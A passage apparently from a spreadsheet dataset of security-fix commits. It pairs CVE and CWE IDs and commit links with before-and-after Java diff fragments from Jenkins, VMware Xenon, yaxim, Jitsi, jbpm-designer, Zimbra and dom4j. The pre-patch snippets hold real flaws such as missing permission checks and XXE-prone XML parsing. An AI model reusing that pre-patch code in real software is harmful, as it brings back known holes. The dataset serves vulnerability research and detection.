    private static final String MAGIC = "::::MAGIC::::";
}
</t>
  </si>
  <si>
    <t>Secret.java</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.crypto.SecretKey;
    private Secret(String value) {
    /**
     * Turns {@link Jenkins#getSecretKey()} into an AES key.
     *
     * @deprecated
     * This is no longer the key we use to encrypt new information, but we still need this
     * to be able to decrypt what's already persisted.
     */
    @Deprecated
    /*package*/ static SecretKey getLegacyKey() throws GeneralSecurityException {
        String secret = SECRET;
        if(secret==null)    return Jenkins.getInstance().getSecretKeyAsAES128();
        return Util.toAes128Key(secret);
    }
            Cipher cipher = KEY.encrypt();
            // add the magic suffix which works like a check sum.
            return new String(Base64.encode(cipher.doFinal((value+MAGIC).getBytes("UTF-8"))));
        } catch (UnsupportedEncodingException e) {
            throw new Error(e); // impossible
     * Pattern matching a possible output of {@link #getEncryptedValue}.
     * Basically, any Base64-encoded value.
     * You must then call {@link #decrypt} to eliminate false positives.
    public static final Pattern ENCRYPTED_VALUE_PATTERN = Pattern.compile("[A-Za-z0-9+/]+={0,2}");
        if(data==null)      return null;
        try {
            byte[] in = Base64.decode(data.toCharArray());
            Secret s = tryDecrypt(KEY.decrypt(), in);
            if (s!=null)    return s;
            // try our historical key for backward compatibility
            Cipher cipher = getCipher("AES");
            cipher.init(Cipher.DECRYPT_MODE, getLegacyKey());
            return tryDecrypt(cipher, in);
        } catch (GeneralSecurityException e) {
            return null;
        } catch (UnsupportedEncodingException e) {
            throw new Error(e); // impossible
        } catch (IOException e) {
            return null;
        }
    }
    /*package*/ static Secret tryDecrypt(Cipher cipher, byte[] in) throws UnsupportedEncodingException {
        try {
            String plainText = new String(cipher.doFinal(in), "UTF-8");
            if(plainText.endsWith(MAGIC))
                return new Secret(plainText.substring(0,plainText.length()-MAGIC.length()));
            return null;
        } catch (GeneralSecurityException e) {
            return null; // if the key doesn't match with the bytes, it can result in BadPaddingException
    private static final String MAGIC = "::::MAGIC::::";
</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright (c) 2016, CloudBees Inc.
import java.util.Arrays;
import static java.nio.charset.StandardCharsets.UTF_8;
    private static final byte PAYLOAD_V1 = 1;
    private byte[] iv;
    /*package*/ Secret(String value) {
        this.value = value;
    }
    /*package*/ Secret(String value, byte[] iv) {
        this.iv = iv;
            synchronized (this) {
                if (iv == null) { //if we were created from plain text or other reason without iv
                    iv = KEY.newIv();
                }
            }
            Cipher cipher = KEY.encrypt(iv);
            byte[] encrypted = cipher.doFinal(this.value.getBytes(UTF_8));
            byte[] payload = new byte[1 + 8 + iv.length + encrypted.length];
            int pos = 0;
            // For PAYLOAD_V1 we use this byte shifting model, V2 probably will need DataOutput
            payload[pos++] = PAYLOAD_V1;
            payload[pos++] = (byte)(iv.length &gt;&gt; 24);
            payload[pos++] = (byte)(iv.length &gt;&gt; 16);
            payload[pos++] = (byte)(iv.length &gt;&gt; 8);
            payload[pos++] = (byte)(iv.length);
            payload[pos++] = (byte)(encrypted.length &gt;&gt; 24);
            payload[pos++] = (byte)(encrypted.length &gt;&gt; 16);
            payload[pos++] = (byte)(encrypted.length &gt;&gt; 8);
            payload[pos++] = (byte)(encrypted.length);
            System.arraycopy(iv, 0, payload, pos, iv.length);
            pos+=iv.length;
            System.arraycopy(encrypted, 0, payload, pos, encrypted.length);
            return "{"+new String(Base64.encode(payload))+"}";
     * Pattern matching a possible output of {@link #getEncryptedValue}
     * Basically, any Base64-encoded value optionally wrapped by {@code {}}.
     * You must then call {@link #decrypt(String)} to eliminate false positives.
     * @see #ENCRYPTED_VALUE_PATTERN
    public static final Pattern ENCRYPTED_VALUE_PATTERN = Pattern.compile("\\{?[A-Za-z0-9+/]+={0,2}}?");
        if (data == null) return null;
        if (data.startsWith("{") &amp;&amp; data.endsWith("}")) { //likely CBC encrypted/containing metadata but could be plain text
            byte[] payload;
            try {
                payload = Base64.decode(data.substring(1, data.length()-1).toCharArray());
            } catch (IOException e) {
                return null;
            }
            switch (payload[0]) {
                case PAYLOAD_V1:
                    // For PAYLOAD_V1 we use this byte shifting model, V2 probably will need DataOutput
                    int ivLength = ((payload[1] &amp; 0xff) &lt;&lt; 24)
                            | ((payload[2] &amp; 0xff) &lt;&lt; 16)
                            | ((payload[3] &amp; 0xff) &lt;&lt; 8)
                            | (payload[4] &amp; 0xff);
                    int dataLength = ((payload[5] &amp; 0xff) &lt;&lt; 24)
                            | ((payload[6] &amp; 0xff) &lt;&lt; 16)
                            | ((payload[7] &amp; 0xff) &lt;&lt; 8)
                            | (payload[8] &amp; 0xff);
                    if (payload.length != 1 + 8 + ivLength + dataLength) {
                        // not valid v1
                        return null;
                    }
                    byte[] iv = Arrays.copyOfRange(payload, 9, 9 + ivLength);
                    byte[] code = Arrays.copyOfRange(payload, 9+ivLength, payload.length);
                    String text;
                    try {
                        text = new String(KEY.decrypt(iv).doFinal(code), UTF_8);
                    } catch (GeneralSecurityException e) {
                        // it's v1 which cannot be historical, but not decrypting
                        return null;
                    }
                    return new Secret(text, iv);
                default:
                    return null;
            }
        } else {
            try {
                return HistoricalSecrets.decrypt(data, KEY);
            } catch (GeneralSecurityException e) {
                return null;
            } catch (UnsupportedEncodingException e) {
                throw new Error(e); // impossible
            } catch (IOException e) {
                return null;
            }
    /**
     * Reset the internal secret key for testing.
     */
    @Restricted(NoExternalUse.class)
    /*package*/ static void resetKeyForTest() {
        KEY.resetForTest();
    }
</t>
  </si>
  <si>
    <t>SecretRewriter.java</t>
  </si>
  <si>
    <t xml:space="preserve">        key = Secret.getLegacyKey();
        Secret sec = Secret.tryDecrypt(cipher, in);
</t>
  </si>
  <si>
    <t xml:space="preserve">        key = HistoricalSecrets.getLegacyKey();
        Secret sec = HistoricalSecrets.tryDecrypt(cipher, in);
</t>
  </si>
  <si>
    <t>CWE-269</t>
  </si>
  <si>
    <t>CVE-2017-2599</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/4ed5c850b6855ab064a66d02fb338f366853ce89</t>
  </si>
  <si>
    <t>AbstractItem.java</t>
  </si>
  <si>
    <t>4ed5c850b6855ab064a66d02fb338f366853ce89</t>
  </si>
  <si>
    <t xml:space="preserve">import org.acegisecurity.Authentication;
import javax.servlet.ServletOutputStream;
                // the test to see if the project already exists or not needs to be done in escalated privilege
                // to avoid overwriting
                ACL.impersonate(ACL.SYSTEM,new NotReallyRoleSensitiveCallable&lt;Void,IOException&gt;() {
                    final Authentication user = Jenkins.getAuthentication();
                    @Override
                    public Void call() throws IOException {
                        Item existing = parent.getItem(newName);
                        if (existing != null &amp;&amp; existing!=AbstractItem.this) {
                            if (existing.getACL().hasPermission(user,Item.DISCOVER))
                                // the look up is case insensitive, so we need "existing!=this"
                                // to allow people to rename "Foo" to "foo", for example.
                                // see http://www.nabble.com/error-on-renaming-project-tt18061629.html
                                throw new IllegalArgumentException("Job " + newName + " already exists");
                            else {
                                // can't think of any real way to hide this, but at least the error message could be vague.
                                throw new IOException("Unable to rename to " + newName);
                            }
                        }
                        return null;
                    }
                });
</t>
  </si>
  <si>
    <t xml:space="preserve">                // the lookup is case insensitive, so we should not fail if this item was the “existing” one
                // to allow people to rename "Foo" to "foo", for example.
                // see http://www.nabble.com/error-on-renaming-project-tt18061629.html
                Items.verifyItemDoesNotAlreadyExist(parent, newName, this);
</t>
  </si>
  <si>
    <t>Merge pull request #90 from jenkinsci-cert/SECURITY-321[SECURITY-321] Prevent existing items from being overwritten even if you cannot DISCOVER them</t>
  </si>
  <si>
    <t>Improper Privilege Management</t>
  </si>
  <si>
    <t>The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.</t>
  </si>
  <si>
    <t>ItemGroupMixIn.java</t>
  </si>
  <si>
    <t xml:space="preserve">        if (parent.getItem(name) != null) {
            throw new IllegalArgumentException(parent.getDisplayName() + " already contains an item '" + name + "'");
        }
        // TODO what if we have no DISCOVER permission on the existing job?
        if(parent.getItem(name)!=null)
            throw new IllegalArgumentException("Project of the name "+name+" already exists");
        // TODO problem with DISCOVER as noted above
</t>
  </si>
  <si>
    <t xml:space="preserve">        Items.verifyItemDoesNotAlreadyExist(parent, name, null);
        Items.verifyItemDoesNotAlreadyExist(parent, name, null);
</t>
  </si>
  <si>
    <t>Items.java</t>
  </si>
  <si>
    <t xml:space="preserve">        if (destination.getItem(name) != null) {
            throw new IllegalArgumentException(name + " already exists");
        }
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.acegisecurity.context.SecurityContext;
import org.acegisecurity.context.SecurityContextHolder;
        verifyItemDoesNotAlreadyExist(destination, name, null);
    /**
     * Securely check for the existence of an item before trying to create one with the same name.
     * @param parent the folder where we are about to create/rename/move an item
     * @param newName the proposed new name
     * @param variant if not null, an existing item which we accept could be there
     * @throws IllegalArgumentException if there is already something there, which you were supposed to know about
     * @throws Failure if there is already something there but you should not be told details
     */
    static void verifyItemDoesNotAlreadyExist(@Nonnull ItemGroup&lt;?&gt; parent, @Nonnull String newName, @CheckForNull Item variant) throws IllegalArgumentException, Failure {
        Item existing;
        SecurityContext orig = ACL.impersonate(ACL.SYSTEM);
        try {
            existing = parent.getItem(newName);
        } finally {
            SecurityContextHolder.setContext(orig);
        }
        if (existing != null &amp;&amp; existing != variant) {
            if (existing.hasPermission(Item.DISCOVER)) {
                String prefix = parent.getFullName();
                throw new IllegalArgumentException((prefix.isEmpty() ? "" : prefix + "/") + newName + " already exists");
            } else {
                // Cannot hide its existence, so at least be as vague as possible.
                throw new Failure("");
            }
        }
    }
</t>
  </si>
  <si>
    <t>CVE-2017-2600</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/0f92cd08a19207de2cceb6a2f4e3e9f92fdc0899</t>
  </si>
  <si>
    <t>Computer.java</t>
  </si>
  <si>
    <t>0f92cd08a19207de2cceb6a2f4e3e9f92fdc0899</t>
  </si>
  <si>
    <t xml:space="preserve">        for (NodeMonitor monitor : NodeMonitor.getAll())
            r.put(monitor.getClass().getName(),monitor.data(this));
</t>
  </si>
  <si>
    <t xml:space="preserve">        if (hasPermission(CONNECT)) {
            for (NodeMonitor monitor : NodeMonitor.getAll())
                r.put(monitor.getClass().getName(), monitor.data(this));
        }
</t>
  </si>
  <si>
    <t>Merge pull request #82 from jenkinsci-cert/security-343[SECURITY-343] Restrict API access to NodeMonitor data</t>
  </si>
  <si>
    <t>CVE-2017-2601</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/fd2e081b947124c90bcd97bfc55e1a7f2ef41a74</t>
  </si>
  <si>
    <t>ParameterValue.java</t>
  </si>
  <si>
    <t>fd2e081b947124c90bcd97bfc55e1a7f2ef41a74</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.IOException;
import java.util.logging.Logger;
import jenkins.model.Jenkins;
import org.kohsuke.accmod.Restricted;
import org.kohsuke.accmod.restrictions.DoNotUse;
    private static final Logger LOGGER = Logger.getLogger(ParameterValue.class.getName());
    @Restricted(DoNotUse.class) // for value.jelly
    public String getFormattedDescription() {
        try {
            return Jenkins.getInstance().getMarkupFormatter().translate(description);
        } catch (IOException e) {
            LOGGER.warning("failed to translate description using configured markup formatter");
            return "";
        }
    }
</t>
  </si>
  <si>
    <t>Merge pull request #95 from jenkinsci-cert/SECURITY-353[SECURITY-353] Persisted XSS in parameter definition names and value descriptions</t>
  </si>
  <si>
    <t>CVE-2017-2603</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/3cd946cbef82c6da5ccccf3890d0ae4e091c4265</t>
  </si>
  <si>
    <t>OfflineCause.java</t>
  </si>
  <si>
    <t>3cd946cbef82c6da5ccccf3890d0ae4e091c4265</t>
  </si>
  <si>
    <t xml:space="preserve">import jenkins.model.Jenkins;
        private final User user;
        public UserCause(User user, String message) {
            super(hudson.slaves.Messages._SlaveComputer_DisconnectedBy(
                    user!=null ? user.getId() : Jenkins.ANONYMOUS.getName(),
            ));
            this.user = user;
            return user;
</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.annotation.CheckForNull;
import java.io.ObjectStreamException;
import java.util.Collections;
     *
        @Deprecated
        private transient User user;
        // null when unknown
        private /*final*/ @CheckForNull String userId;
        public UserCause(@CheckForNull User user, @CheckForNull String message) {
            this(
                    user != null ? user.getId() : null,
            );
        }
        private UserCause(String userId, String message) {
            super(hudson.slaves.Messages._SlaveComputer_DisconnectedBy(userId, message));
            this.userId = userId;
            return userId == null
                    ? User.getUnknown()
                    : User.getById(userId, true)
            ;
        }
        // Storing the User in a filed was a mistake, switch to userId
        @SuppressWarnings("deprecation")
        private Object readResolve() throws ObjectStreamException {
            if (user != null) {
                String id = user.getId();
                if (id != null) {
                    userId = id;
                } else {
                    // The user field is not properly deserialized so id may be missing. Look the user up by fullname
                    User user = User.get(this.user.getFullName(), true, Collections.emptyMap());
                    userId = user.getId();
                }
                this.user = null;
            }
            return this;
</t>
  </si>
  <si>
    <t>Merge pull request #80 from jenkinsci-cert/SECURITY-362[SECURITY-362] Do not persist User in OfflineCause.UserCause</t>
  </si>
  <si>
    <t>CVE-2017-2604</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/6efcf6c2ac39bc5c59ac7251822be8ddf67ceaf8</t>
  </si>
  <si>
    <t>HudsonHomeDiskUsageMonitor.java</t>
  </si>
  <si>
    <t>6efcf6c2ac39bc5c59ac7251822be8ddf67ceaf8</t>
  </si>
  <si>
    <t xml:space="preserve">import jenkins.model.Jenkins;
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.kohsuke.stapler.interceptor.RequirePOST;
    @RequirePOST
</t>
  </si>
  <si>
    <t>Merge pull request #85 from jenkinsci-cert/security-371-staplerproxy[SECURITY-371] Secure all administrative monitors</t>
  </si>
  <si>
    <t>ReverseProxySetupMonitor.java</t>
  </si>
  <si>
    <t>TooManyJobsButNoView.java</t>
  </si>
  <si>
    <t>AdministrativeMonitor.java</t>
  </si>
  <si>
    <t xml:space="preserve">public abstract class AdministrativeMonitor extends AbstractModelObject implements ExtensionPoint {
        Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.kohsuke.accmod.Restricted;
import org.kohsuke.accmod.restrictions.NoExternalUse;
import org.kohsuke.stapler.StaplerProxy;
import org.kohsuke.stapler.interceptor.RequirePOST;
public abstract class AdministrativeMonitor extends AbstractModelObject implements ExtensionPoint, StaplerProxy {
    @RequirePOST
    /**
     * Requires ADMINISTER permission for any operation in here.
     */
    @Restricted(NoExternalUse.class)
    public Object getTarget() {
        Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
        return this;
    }
</t>
  </si>
  <si>
    <t>SecurityIsOffMonitor.java</t>
  </si>
  <si>
    <t>RekeySecretAdminMonitor.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.kohsuke.stapler.StaplerProxy;
public class RekeySecretAdminMonitor extends AsynchronousAdministrativeMonitor implements StaplerProxy {
    /**
     * Requires ADMINISTER permission for any operation in here.
     */
    public Object getTarget() {
        Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
        return this;
    }
</t>
  </si>
  <si>
    <t xml:space="preserve">public class RekeySecretAdminMonitor extends AsynchronousAdministrativeMonitor {
</t>
  </si>
  <si>
    <t>AdminCallableMonitor.java</t>
  </si>
  <si>
    <t>MasterKillSwitchWarning.java</t>
  </si>
  <si>
    <t>CVE-2017-2606</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/09cfbc9cd5c9df7c763bc976b7f5c51266b63719</t>
  </si>
  <si>
    <t>09cfbc9cd5c9df7c763bc976b7f5c51266b63719</t>
  </si>
  <si>
    <t xml:space="preserve">import hudson.security.FullControlOnceLoggedInAuthorizationStrategy;
        if (authorizationStrategy instanceof AuthorizationStrategy.Unsecured ||
            authorizationStrategy instanceof FullControlOnceLoggedInAuthorizationStrategy) {
            return new ArrayList(items.values());
        }
</t>
  </si>
  <si>
    <t>Merge pull request #86 from jenkinsci-cert/SECURITY-380[FIX SECURITY-380] Don't optimize permission check in getItems()</t>
  </si>
  <si>
    <t>CVE-2017-2609</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/13905d8224899ba7332fe9af4e330ea96a2ae319</t>
  </si>
  <si>
    <t>13905d8224899ba7332fe9af4e330ea96a2ae319</t>
  </si>
  <si>
    <t xml:space="preserve">                protected Collection&lt;View&gt; all() { return views; }
</t>
  </si>
  <si>
    <t xml:space="preserve">                protected Collection&lt;View&gt; all() { return viewGroupMixIn.getViews(); }
</t>
  </si>
  <si>
    <t>Merge pull request #96 from jenkinsci-cert/SECURITY-385[SECURITY-385] Only suggest visible views in search</t>
  </si>
  <si>
    <t>CVE-2017-2613</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/b88b20ec473200db35d0a0d29dcf192069106601</t>
  </si>
  <si>
    <t>b88b20ec473200db35d0a0d29dcf192069106601</t>
  </si>
  <si>
    <t xml:space="preserve">    /**
     * Jenkins historically created a (usually) ephemeral user record when an user with Overall/Administer permission
     * accesses a /user/arbitraryName URL.
     * &lt;p&gt;
     * Unfortunately this constitutes a CSRF vulnerability, as malicious users can make admins create arbitrary numbers
     * of ephemeral user records, so the behavior was changed in Jenkins 2.TODO / 2.32.2.
     * &lt;p&gt;
     * As some users may be relying on the previous behavior, setting this to true restores the previous behavior. This
     * is not recommended.
     *
     * SECURITY-406.
     */
    // TODO 2.4+ SystemProperties
    @Restricted(NoExternalUse.class)
    public static boolean ALLOW_USER_CREATION_VIA_URL = Boolean.getBoolean(User.class.getName() + ".allowUserCreationViaUrl");
</t>
  </si>
  <si>
    <t>Merge pull request #107 from jenkinsci-cert/SECURITY-406[SECURITY-406] Prevent user creation via GET /user/whatever</t>
  </si>
  <si>
    <t xml:space="preserve">     * @return the user of the given name (which may or may not be an id), if that person exists or the invoker {@link #hasPermission} on {@link #ADMINISTER}; else null
        return User.get(name,hasPermission(ADMINISTER));
</t>
  </si>
  <si>
    <t xml:space="preserve">     * @return the user of the given name (which may or may not be an id), if that person exists; else null
        return User.get(name, User.ALLOW_USER_CREATION_VIA_URL &amp;&amp; hasPermission(ADMINISTER));
</t>
  </si>
  <si>
    <t>CVE-2017-4952</t>
  </si>
  <si>
    <t>https://github.com/vmware/xenon/commit/055ae13603f0cc3cd7cf59f20ce314bf8db583e1</t>
  </si>
  <si>
    <t>UtilityService.java</t>
  </si>
  <si>
    <t>055ae13603f0cc3cd7cf59f20ce314bf8db583e1</t>
  </si>
  <si>
    <t xml:space="preserve">        op.complete();
</t>
  </si>
  <si>
    <t xml:space="preserve">        String suffix = UriUtils.buildUriPath(UriUtils.URI_PATH_CHAR, UriUtils.getLastPathSegment(op.getUri()));
        // allow access to ui endpoint
        if (ServiceHost.SERVICE_URI_SUFFIX_UI.equals(suffix)) {
            op.complete();
            return;
        }
        ServiceDocument doc = new ServiceDocument();
        if (this.parent.getOptions().contains(ServiceOption.FACTORY_ITEM)) {
            doc.documentSelfLink = UriUtils.buildUriPath(UriUtils.getParentPath(this.parent.getSelfLink()), suffix);
        } else {
            doc.documentSelfLink = UriUtils.buildUriPath(this.parent.getSelfLink(), suffix);
        }
        doc.documentKind = Utils.buildKind(this.parent.getStateType());
        if (getHost().isAuthorized(this.parent, doc, op)) {
            op.complete();
            return;
        }
        op.fail(Operation.STATUS_CODE_FORBIDDEN);
</t>
  </si>
  <si>
    <t>Add auth to UtilityServiceExtend auth check to UtiliyService endpoints: stats, config, subscription
Issue: VRXEN-5
Change-Id: I52a4b4a42731c244a97f97610dcaddb6837e67fb</t>
  </si>
  <si>
    <t>AuthorizationHelper.java</t>
  </si>
  <si>
    <t xml:space="preserve">import com.vmware.xenon.services.common.ExampleService;
        // Create resource group to allow access on utility paths
        String statsResourceGroupLink = createResourceGroup(target, "stats-resource-group",
                Builder.create()
                        .addFieldClause(
                                ServiceDocument.FIELD_NAME_SELF_LINK,
                                ExampleService.FACTORY_LINK + ServiceHost.SERVICE_URI_SUFFIX_STATS)
                        .build());
        String subscriptionsResourceGroupLink = createResourceGroup(target, "subs-resource-group",
                Builder.create()
                        .addFieldClause(
                                ServiceDocument.FIELD_NAME_SELF_LINK,
                                ServiceUriPaths.CORE_LOCAL_QUERY_TASKS
                                        + ServiceHost.SERVICE_URI_SUFFIX_SUBSCRIPTIONS)
                        .build());
        // Create role authorizing access to /stats
        paths.add(createRole(target, userGroupLink, statsResourceGroupLink,
                new HashSet&lt;&gt;(
                        Arrays.asList(Action.GET, Action.POST, Action.PATCH, Action.DELETE))));
        // Create role authorizing access to /subscriptions of query tasks
        paths.add(createRole(target, userGroupLink, subscriptionsResourceGroupLink,
                new HashSet&lt;&gt;(
                        Arrays.asList(Action.GET, Action.POST, Action.PATCH, Action.DELETE))));
</t>
  </si>
  <si>
    <t>VerificationHost.java</t>
  </si>
  <si>
    <t xml:space="preserve">import com.vmware.xenon.common.OperationContext;
        AuthorizationContext ctx = null;
        if (this.isAuthorizationEnabled()) {
            ctx = OperationContext.getAuthorizationContext();
            this.setSystemAuthorizationContext();
        }
        if (this.isAuthorizationEnabled()) {
            this.setAuthorizationContext(ctx);
        }
</t>
  </si>
  <si>
    <t>https://github.com/vmware/xenon/commit/06b9947cf603ba40fd8b03bfeb2e84528a7ab592</t>
  </si>
  <si>
    <t>06b9947cf603ba40fd8b03bfeb2e84528a7ab592</t>
  </si>
  <si>
    <t>https://github.com/vmware/xenon/commit/30ae41bccf418d88b52b35a81efb3c1304b798f8</t>
  </si>
  <si>
    <t>30ae41bccf418d88b52b35a81efb3c1304b798f8</t>
  </si>
  <si>
    <t>https://github.com/vmware/xenon/commit/5682ef8d40569afd00fb9a5933e7706bb5b66713</t>
  </si>
  <si>
    <t>5682ef8d40569afd00fb9a5933e7706bb5b66713</t>
  </si>
  <si>
    <t>https://github.com/vmware/xenon/commit/756d893573414eec8635c2aba2345c4dcf10b21c</t>
  </si>
  <si>
    <t>756d893573414eec8635c2aba2345c4dcf10b21c</t>
  </si>
  <si>
    <t>https://github.com/vmware/xenon/commit/7a747d82b80cd38d2c11a0d9cdedb71c722a2c75</t>
  </si>
  <si>
    <t>7a747d82b80cd38d2c11a0d9cdedb71c722a2c75</t>
  </si>
  <si>
    <t>https://github.com/vmware/xenon/commit/b1fd306047ecdac82661d636ebee801a7f2b3a0a</t>
  </si>
  <si>
    <t>b1fd306047ecdac82661d636ebee801a7f2b3a0a</t>
  </si>
  <si>
    <t>https://github.com/vmware/xenon/commit/c23964eb57e846126daef98ef7ed15400313e977</t>
  </si>
  <si>
    <t>c23964eb57e846126daef98ef7ed15400313e977</t>
  </si>
  <si>
    <t>https://github.com/vmware/xenon/commit/ec30db9afada9cb52852082ce4d7d0095524f3b3</t>
  </si>
  <si>
    <t>ec30db9afada9cb52852082ce4d7d0095524f3b3</t>
  </si>
  <si>
    <t>CWE-346</t>
  </si>
  <si>
    <t>CVE-2017-5589</t>
  </si>
  <si>
    <t>https://github.com/ge0rg/yaxim/commit/65a38dc77545d9568732189e86089390f0ceaf9f</t>
  </si>
  <si>
    <t>SmackableImp.java</t>
  </si>
  <si>
    <t>65a38dc77545d9568732189e86089390f0ceaf9f</t>
  </si>
  <si>
    <t xml:space="preserve">					if (cc != null &amp;&amp; !msg.getFrom().equalsIgnoreCase(mConfig.jabberID)) {
						Log.w(TAG, "Received illegal carbon from " + msg.getFrom() + ": " + cc.toXML());
						cc = null;
					}
</t>
  </si>
  <si>
    <t>Smackable: improved carbon checks</t>
  </si>
  <si>
    <t>Origin Validation Error</t>
  </si>
  <si>
    <t>The software does not properly verify that the source of data or communication is valid.</t>
  </si>
  <si>
    <t>CVE-2017-5603</t>
  </si>
  <si>
    <t>https://github.com/jitsi/jitsi/commit/7d66da61b316c9480b63000f831b6de723b87315</t>
  </si>
  <si>
    <t>OperationSetBasicInstantMessagingJabberImpl.java</t>
  </si>
  <si>
    <t>7d66da61b316c9480b63000f831b6de723b87315</t>
  </si>
  <si>
    <t xml:space="preserve">                // according to xep-0280 all carbons should come from
                // our bare jid
                if (!msg.getFrom().equals(
                        StringUtils.parseBareAddress(
                            jabberProvider.getOurJID())))
                {
                    logger.info("Received a carbon copy with wrong from!");
                    return;
                }
</t>
  </si>
  <si>
    <t>Checks from for received carbon messages, should be bare jid.</t>
  </si>
  <si>
    <t>CVE-2017-7545</t>
  </si>
  <si>
    <t>https://github.com/kiegroup/jbpm-designer/commit/a143f3b92a6a5a527d929d68c02a0c5d914ab81d</t>
  </si>
  <si>
    <t>TransformerServlet.java</t>
  </si>
  <si>
    <t>a143f3b92a6a5a527d929d68c02a0c5d914ab81d</t>
  </si>
  <si>
    <t xml:space="preserve">import org.jbpm.migration.JbpmMigration;
    private static final String JPDL_TO_BPMN2 = "jpdl2bpmn2";
        } else if (transformto != null &amp;&amp; transformto.equals(JPDL_TO_BPMN2)) {
            try {
                String bpmn2 = JbpmMigration.transform(jpdl);
                Definitions def = ((JbpmProfileImpl) profile).getDefinitions(bpmn2);
                // add bpmndi info to Definitions with help of gpd
                addBpmnDiInfo(def, gpd);
                // hack for now
                revisitSequenceFlows(def, bpmn2);
                // another hack if id == name
                revisitNodeNames(def);
                // get the xml from Definitions
                ResourceSet rSet = new ResourceSetImpl();
                rSet.getResourceFactoryRegistry().getExtensionToFactoryMap().put("bpmn2", new JBPMBpmn2ResourceFactoryImpl());
                JBPMBpmn2ResourceImpl bpmn2resource = (JBPMBpmn2ResourceImpl) rSet.createResource(URI.createURI("virtual.bpmn2"));
                rSet.getResources().add(bpmn2resource);
                bpmn2resource.getContents().add(def);
                ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
                bpmn2resource.save(outputStream, new HashMap&lt;Object, Object&gt;());
                String fullXmlModel =  outputStream.toString();
                // convert to json and write response
                String json = profile.createUnmarshaller().parseModel(fullXmlModel, profile, pp);
                resp.setCharacterEncoding("UTF-8");
                resp.setContentType("application/json");
                resp.getWriter().print(json);
            } catch(Exception e) {
                _logger.error(e.getMessage());
                resp.setContentType("application/json");
                resp.getWriter().print("{}");
            }
        }  else if (transformto != null &amp;&amp; transformto.equals(BPMN2_TO_JSON)) {
</t>
  </si>
  <si>
    <t xml:space="preserve">        } else if (transformto != null &amp;&amp; transformto.equals(BPMN2_TO_JSON)) {
</t>
  </si>
  <si>
    <t>JBPM-6415 - Remove jPDL migration plugin and its use from jbpm-design……er (#658) (#673)</t>
  </si>
  <si>
    <t>CVE-2020-10194</t>
  </si>
  <si>
    <t>https://github.com/Zimbra/zm-mailbox/commit/1df440e0efa624d1772a05fb6d397d9beb4bda1e</t>
  </si>
  <si>
    <t>AutoCompleteGal.java</t>
  </si>
  <si>
    <t>1df440e0efa624d1772a05fb6d397d9beb4bda1e</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2013, 2014, 2016 Synacor, Inc.
        if (galAcctId != null)
            params.setGalSyncAccount(Provisioning.getInstance().getAccountById(galAcctId));
</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2013, 2014, 2016, 2020 Synacor, Inc.
        if (galAcctId != null) {
            Account galAccount = Provisioning.getInstance().getAccountById(galAcctId);
            if (galAccount != null &amp;&amp; (!account.getDomainId().equals(galAccount.getDomainId()))) {
                throw ServiceException
                    .PERM_DENIED("can not access galsync account of different domain");
            }
            params.setGalSyncAccount(galAccount);
        }
</t>
  </si>
  <si>
    <t>ZBUG-1094:Broken GAL search filtering</t>
  </si>
  <si>
    <t>CVE-2020-10683</t>
  </si>
  <si>
    <t>https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658</t>
  </si>
  <si>
    <t>DocumentHelper.java</t>
  </si>
  <si>
    <t>a8228522a99a02146106672a34c104adbda5c658</t>
  </si>
  <si>
    <t xml:space="preserve">     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
     * 
        SAXReader reader = new SAXReader();
        try {
            reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
            reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        } catch (SAXException e) {
            //Parse with external resources downloading allowed.
        }
     * 
     * 
 * 
 * 
 * 
 * 
 * 
 * 
 * 
</t>
  </si>
  <si>
    <t xml:space="preserve">     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
     *
        SAXReader reader = SAXReader.createDefault();
     *
     *
 *
 *
 *
 *
 *
 *
 *
</t>
  </si>
  <si>
    <t>SAXReader uses system default XMLReader with its defaults. New factor……y method SAXReader.createDefault() sets more secure defaults.</t>
  </si>
  <si>
    <t>SAXHelper.java</t>
  </si>
  <si>
    <t xml:space="preserve"> * 
     * 
     * 
     * 
     * 
     * 
 * 
 * 
 * 
 * 
 * 
 * 
 * 
</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.xml.parsers.SAXParserFactory;
 *
     *
     * This method internally calls {@link SAXParserFactory}{@code .newInstance().newSAXParser().getXMLReader()} or {@link XMLReaderFactory#createXMLReader()}.
     * Be sure to configure returned reader if the default configuration does not suit you. Consider setting the following properties:
     *
     * &lt;pre&gt;
     * reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
     * reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
     * reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
     * &lt;/pre&gt;
     *
     *
     *
     *
     *
 *
 *
 *
 *
 *
 *
 *
</t>
  </si>
  <si>
